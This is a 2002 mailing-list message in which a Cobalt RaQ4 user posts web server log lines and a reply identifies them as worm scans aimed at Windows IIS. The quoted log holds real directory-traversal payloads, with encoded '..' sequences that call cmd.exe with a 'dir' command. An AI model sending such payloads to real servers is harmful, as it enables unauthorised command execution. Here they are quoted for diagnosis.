[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Raq4 Intrusion

Subject: Re: [cobalt-users] Raq4 Intrusion
From: "Torsten Ewald" <te@xxxxxxxxxxxxxxxxxxx>
Date: Thu Feb 14 03:24:32 2002
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

Hi,
this means, that someoneis scanning your sever for activating a Code Red
Virus which is only dangerous for a windows system. Because of your Linux
System, you can reject this message. You can see, that someone is looking
for Code Red by Requesting the program "root.exe".

Regards
Torsten

----- Original Message -----
From: <lewis.tim@xxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, February 14, 2002 11:01 AM
Subject: [cobalt-users] Raq4 Intrusion


>
> Hi
> Any ideas on nature of this intrusion:-
>  "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"
>  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 226 "-" "-"
>  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
>  "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
>  "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252
"-" "-"
>  "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 273 "-" "-"
>  "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 273 "-" "-"
>  "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 302 301 "-" "-"
>  "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
"-" "-"
>  "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 645
"-" "-"
>  "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
"-" "-"
>  "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253
"-" "-"
>  "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"-" "-"
>  "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"-" "-"
>  "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
252 "-" "-"
>  "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252
"-" "-"
> thanks
> Lewis
>
>
>
> --------------------
> talk21 your FREE portable and private address on the net at
http://www.talk21.com
>
>
> _______________________________________________
> cobalt-users mailing list
> cobalt-users@xxxxxxxxxxxxxxx
> To Subscribe or Unsubscribe, please go to:
> http://list.cobalt.com/mailman/listinfo/cobalt-users
>

Follow-Ups:
- Re: [cobalt-users] Raq4 Intrusion
  - From: Nell Bolen

References:
- [cobalt-users] Raq4 Intrusion
  - From: lewis . tim

Prev by Date: Re: [cobalt-users] Site admin user only logs into user web directory after OS 2 update
Next by Date: RE: [cobalt-users] Raq4 Intrusion
Previous by thread: Re: [cobalt-users] Raq4 Intrusion
Next by thread: Re: [cobalt-users] Raq4 Intrusion

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index